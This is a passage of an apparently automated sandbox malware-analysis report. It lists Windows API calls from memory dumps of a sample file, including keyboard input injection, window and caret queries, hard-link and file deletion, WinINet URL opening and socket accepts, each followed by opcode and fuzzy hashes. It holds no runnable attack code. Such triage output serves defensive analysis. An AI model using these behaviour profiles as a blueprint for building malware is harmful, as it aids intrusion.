                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: 42ef2a929ff2e63b7ccf1d043a3420e15e8da37301cf3126cd1d42cf6dab2d72
                                                        • Instruction ID: beb7d723ecb724b6f48ba8ec0d6dba84bb5f50f4197d3547ac01dafdcf02eddf
                                                        • Opcode Fuzzy Hash: 42ef2a929ff2e63b7ccf1d043a3420e15e8da37301cf3126cd1d42cf6dab2d72
                                                        • Instruction Fuzzy Hash: 2FA15A356047019FCB10EF14C891B5AB7E5BF89714F185859FA9ABB3A2CB30ED44CB86
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 17d1126fa37f102ad5bad3ecf377d6a6a64dcc18aac057044148a4e6b17eef37
                                                        • Instruction ID: 1091000633c647d0c99774a1686fe48479a5da46b209e720d8e1366a01aacf02
                                                        • Opcode Fuzzy Hash: 17d1126fa37f102ad5bad3ecf377d6a6a64dcc18aac057044148a4e6b17eef37
                                                        • Instruction Fuzzy Hash: 5851B730604706ABDB24AF65D891A6EB3E5EF45314F20E82FE55EFB2D3DB7098448705
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                        • String ID:
                                                        • API String ID: 3877424927-0
                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                        • Instruction ID: ea0408d8994c3fadff6e23f68fd54d57a0cddce3df523f5d4bbabfd2ca276c1c
                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                        • Instruction Fuzzy Hash: 0951B7B4A40205ABDB248F79E8845AF77B1AF403A4F24972AF835B72D0D771AF508B50
                                                        APIs
                                                        • GetWindowRect.USER32(009D69B0,?), ref: 00EAC544
                                                        • ScreenToClient.USER32(?,00000002), ref: 00EAC574
                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00EAC5DA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 5baba15d74aacdd209c181838756bb58e0b6d437dd643e2414423a8ebb192967
                                                        • Instruction ID: 7e3de5052e7bdb54013e089548635852732f9d3cda7a8bc1ceeb618a105ef0da
                                                        • Opcode Fuzzy Hash: 5baba15d74aacdd209c181838756bb58e0b6d437dd643e2414423a8ebb192967
                                                        • Instruction Fuzzy Hash: 7E514E75900208EFCF10DF68C880AAE7BB5FB5A724F209659F965AB290D731FD41DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E7C462
                                                        • __itow.LIBCMT ref: 00E7C49C
                                                          • Part of subcall function 00E7C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E7C753
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E7C505
                                                        • __itow.LIBCMT ref: 00E7C55A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: d59e704eed43bc64a46764e8adf133d166479905fecbf8fd5405bd3430062e51
                                                        • Instruction ID: 0856c4b7edf118e94c6bd476d3f02cbc0faecd990cee7911f1613599cd324942
                                                        • Opcode Fuzzy Hash: d59e704eed43bc64a46764e8adf133d166479905fecbf8fd5405bd3430062e51
                                                        • Instruction Fuzzy Hash: 6041E331A00608AFDF21DF54D841BEE7BF9AF48704F105069FA09B3282DB719A49CBA1
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E83966
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E83982
                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00E839EF
                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00E83A4D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: c5c5dce462ca2e1903eade1d61f749f537cd807f6388e42c5f884124674a545d
                                                        • Instruction ID: 189fbef649024baad3870b325b0876b95e377fe18f1cd8bdb6d56b8590cb332c
                                                        • Opcode Fuzzy Hash: c5c5dce462ca2e1903eade1d61f749f537cd807f6388e42c5f884124674a545d
                                                        • Instruction Fuzzy Hash: 8A413770E04208AEEF31AB74C805BFDBBB9AB85714F04215AE5CDB22C1C7B58E85D765
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E8E742
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00E8E768
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E8E78D
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E8E7B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 20b14a408615ea486ef0ce3e7a9bf510edcf83f9aecd1600938eca229b68fec8
                                                        • Instruction ID: c4a270ce34d5e4d15ca38b1b7d55368c2c78c0eac9e17f846e47444a7757388a
                                                        • Opcode Fuzzy Hash: 20b14a408615ea486ef0ce3e7a9bf510edcf83f9aecd1600938eca229b68fec8
                                                        • Instruction Fuzzy Hash: FB415639600610DFCF11EF15C444A4EBBE5BF9A720B099499E94ABB3A2CB71FD01CB91
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EAB5D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: 8ad14c653109bd0ee9ffc23d7b0ca80c81ac8ef1a9a7a114f75ca1a9b4036b2b
                                                        • Instruction ID: c1d90d6f3d7a73c3f561f6fc29ef2c3db61f782c66b74216dfb52bdea343cd2c
                                                        • Opcode Fuzzy Hash: 8ad14c653109bd0ee9ffc23d7b0ca80c81ac8ef1a9a7a114f75ca1a9b4036b2b
                                                        • Instruction Fuzzy Hash: BE31CD34A00208AFEB248F18CC85FE93BA6BB4F314F546111FA52FA1E3C731B9509A51
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00EAD807
                                                        • GetWindowRect.USER32(?,?), ref: 00EAD87D
                                                        • PtInRect.USER32(?,?,00EAED5A), ref: 00EAD88D
                                                        • MessageBeep.USER32(00000000), ref: 00EAD8FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: ceec59ac51891f4e97fbe673661f86216178f2edfcc09f8c5b2e40852d2a3769
                                                        • Instruction ID: bb6362d06cf687aba9f86d8ebdfbd430ca8c75a329eadb667e1befcc316bee6c
                                                        • Opcode Fuzzy Hash: ceec59ac51891f4e97fbe673661f86216178f2edfcc09f8c5b2e40852d2a3769
                                                        • Instruction Fuzzy Hash: 3B41AB70A08208DFCB19CF59CC80BA9BBF5BF4A315F1981A9E816AF660C335F845CB40
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E83AB8
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E83AD4
                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00E83B34
                                                        • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E83B92
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: 75301f0764e17c06bc7618361ff789ad954f79d0046496f390739e4f254b7d65
                                                        • Instruction ID: a69e01e44d34b9ffbfc161f83e5abb0085e224d3b404e8d313c8daaed3a7f791
                                                        • Opcode Fuzzy Hash: 75301f0764e17c06bc7618361ff789ad954f79d0046496f390739e4f254b7d65
                                                        • Instruction Fuzzy Hash: 7D3146B0900248AEEF31AB74C819BFEBBE69B45714F04226AE48DB32D1C7758F45C765
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E74038
                                                        • __isleadbyte_l.LIBCMT ref: 00E74066
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E74094
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E740CA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: ab9a5a1df6cbc992acf717b14e653b9d62d82f6135445df48283006f9dc44d76
                                                        • Instruction ID: 2fd8d697ef8dade9a1bf748475863e995867dc1d0d405adbf3e010ff63b2efbe
                                                        • Opcode Fuzzy Hash: ab9a5a1df6cbc992acf717b14e653b9d62d82f6135445df48283006f9dc44d76
                                                        • Instruction Fuzzy Hash: DD31D071600216AFDB21DF34C844BBA7BE5FF40354F199028E669AB1E0E731D891DB92
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00EA7CB9
                                                          • Part of subcall function 00E85F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E85F6F
                                                          • Part of subcall function 00E85F55: GetCurrentThreadId.KERNEL32 ref: 00E85F76
                                                          • Part of subcall function 00E85F55: AttachThreadInput.USER32(00000000,?,00E8781F), ref: 00E85F7D
                                                        • GetCaretPos.USER32(?), ref: 00EA7CCA
                                                        • ClientToScreen.USER32(00000000,?), ref: 00EA7D03
                                                        • GetForegroundWindow.USER32 ref: 00EA7D09
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 9a1e9e2f4931b50c37a5e96de7a6f4000a6fdd419155eade5e66af80c93a311a
                                                        • Instruction ID: a743e4162b99eb3fa9e3d68a2e2e97fb0ec7ca4cca2869c57748c48c9ddac04b
                                                        • Opcode Fuzzy Hash: 9a1e9e2f4931b50c37a5e96de7a6f4000a6fdd419155eade5e66af80c93a311a
                                                        • Instruction Fuzzy Hash: C6311072900108AFDB10EFA5CC459EFFBF9EF99314B10946AE959F7211DA319E05CBA0
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • GetCursorPos.USER32(?), ref: 00EAF211
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EBE4C0,?,?,?,?,?), ref: 00EAF226
                                                        • GetCursorPos.USER32(?), ref: 00EAF270
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EBE4C0,?,?,?), ref: 00EAF2A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: d8343dde3f65658760015b6271255ea367ce0cda2233f897a7315e13f5100c06
                                                        • Instruction ID: deb5e3b72eb929567c7ffd7852f61c883cbd978f29e45385e66b4f42804c186b
                                                        • Opcode Fuzzy Hash: d8343dde3f65658760015b6271255ea367ce0cda2233f897a7315e13f5100c06
                                                        • Instruction Fuzzy Hash: 9A219E39500018EFCB158F95DC98EFA7BB9FF0A314F044469F9096B2B1D332A951DB60
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E94358
                                                          • Part of subcall function 00E943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E94401
                                                          • Part of subcall function 00E943E2: InternetCloseHandle.WININET(00000000), ref: 00E9449E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 6b38be5fadd0a115075b0202edc78ee20f548e9e08382d37a6ee3af48f6e984d
                                                        • Instruction ID: 27f4264c8124998eb76c453c9e6f53d03e1c2ec16d8225bb95f332687621adf0
                                                        • Opcode Fuzzy Hash: 6b38be5fadd0a115075b0202edc78ee20f548e9e08382d37a6ee3af48f6e984d
                                                        • Instruction Fuzzy Hash: 3821CFB2204701BFEF16DF719C00FBBB7A9FF44714F00602ABA15A6690DB7298269790
                                                        APIs
                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00E98AE0
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00E98AF2
                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00E98AFF
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E98B16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastacceptselect
                                                        • String ID:
                                                        • API String ID: 385091864-0
                                                        • Opcode ID: 3b4396ae6d81b14c402f4cbc452652de1e7330d98e6affb49a55bee485388cf0
                                                        • Instruction ID: 8695ac043b1fc7b9fdca5b824186f9f2212ada0ccbb65759f537b307c2116961
                                                        • Opcode Fuzzy Hash: 3b4396ae6d81b14c402f4cbc452652de1e7330d98e6affb49a55bee485388cf0
                                                        • Instruction Fuzzy Hash: 83219372A001249FCB219F69CD85E9EBBECEF4A310F00416AF849E7291DB749A458F90
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EA8AA6
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EA8AC0
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00EA8ACE
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00EA8ADC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: 522d30e897f0961d219a07b08e8be8a8d3e96d7614bb6b619984958a5113b216
                                                        • Instruction ID: 4b10ec51ce0632d3785be4c707051be868509e3728d21270b70811a4e8419648
                                                        • Opcode Fuzzy Hash: 522d30e897f0961d219a07b08e8be8a8d3e96d7614bb6b619984958a5113b216
                                                        • Instruction Fuzzy Hash: 9911E131205010AFD744AB14DD05FBA77D8BF8A321F145129F926EB2E1CB71BC018794
                                                        APIs
                                                          • Part of subcall function 00E81E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E80ABB,?,?,?,00E8187A,00000000,000000EF,00000119,?,?), ref: 00E81E77
                                                          • Part of subcall function 00E81E68: lstrcpyW.KERNEL32(00000000,?,?,00E80ABB,?,?,?,00E8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E81E9D
                                                          • Part of subcall function 00E81E68: lstrcmpiW.KERNEL32(00000000,?,00E80ABB,?,?,?,00E8187A,00000000,000000EF,00000119,?,?), ref: 00E81ECE
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E80AD4
                                                        • lstrcpyW.KERNEL32(00000000,?,?,00E8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E80AFA
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E8187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E80B2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 6154732999004b5db5ff43942a63344534911fb360694764b94798f4f7bbf27c
